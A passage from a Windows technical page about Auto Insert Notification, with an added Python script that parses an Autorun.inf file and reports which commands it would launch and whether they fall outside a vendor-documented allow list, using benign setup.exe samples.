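Disabling Auto Insert Notification stops Windows from running the file for you, but a defender still wants to know what a disc or removable drive would have launched. The following added example (not code from the original text) is a small Autorun.inf parser and auditor: it lists every command the `[autorun]` section could execute (the `open=` and `shellexecute=` keys and any `shell\<verb>\command=` entries), and compares them against the set of programs the vendor documented, so a disc whose autorun points somewhere unexpected stands out before anyone double-clicks it. The second sample file is constructed for illustration; the first is the page's own example.

```python
"""Added example: parse and audit an Autorun.inf before trusting a disc.
Example code written for this page, not from the original text."""
import re

# Keys whose value AutoRun executes directly
_LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text: str) -> dict:
    """Parse INI-style Autorun.inf text into {section: {key: value}}.
    Section and key names are lower-cased and whitespace around '=' is
    stripped, so "Open= setup.exe" and "open=setup.exe" read the same."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_targets(text: str) -> list:
    """Every command AutoRun could run from this file, in the order found:
    open=, shellexecute=, then shell\\<verb>\\command= context-menu verbs."""
    auto = parse_autorun(text).get("autorun", {})
    targets = [auto[k] for k in _LAUNCH_KEYS if k in auto]
    for key, value in auto.items():
        if key.startswith("shell\\") and key.endswith("\\command"):
            targets.append(value)
    return targets


def _program(cmd: str) -> str:
    """First token of a command line, honouring a quoted program path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    parts = cmd.split()
    return parts[0] if parts else ""


def unexpected_targets(text: str, allowed: set) -> list:
    """Commands whose program is not in the vendor-documented allowed set."""
    allowed_lc = {a.lower() for a in allowed}
    return [c for c in launch_targets(text)
            if _program(c).lower() not in allowed_lc]


def audit(text: str, allowed: set) -> list:
    """Human-readable findings for someone reviewing the disc."""
    auto = parse_autorun(text).get("autorun", {})
    if not auto:
        return ["no [autorun] section: AutoRun would launch nothing"]
    findings = [f"would execute: {cmd}" for cmd in launch_targets(text)]
    if "label" in auto:
        findings.append(f"drive label shown to the user: {auto['label']}")
    for cmd in unexpected_targets(text, allowed):
        findings.append(f"NOT in documented setup programs: {cmd}")
    return findings


# The page's own example, as written (key case and spacing preserved)
PAGE_SAMPLE = "[autorun]\nOpen= setup.exe\nIcon= setup.exe\n"

# Constructed sample with a context-menu verb and a label (not from the page)
VERB_SAMPLE = ("[autorun]\n"
               "open=setup.exe\n"
               "shell\\install\\command=setup.exe /silent\n"
               "shell=install\n"
               "label=Product CD\n")

if __name__ == "__main__":
    for finding in audit(VERB_SAMPLE, {"setup.exe"}):
        print(finding)
```

The parser deliberately does not execute or resolve anything; it only reports. On the NT family of Windows the per-drive Auto Insert Notification setting described above corresponds to the `Autorun` value under `HKLM\SYSTEM\CurrentControlSet\Services\Cdrom`, which is the place to verify that the countermeasure actually took effect on a given machine.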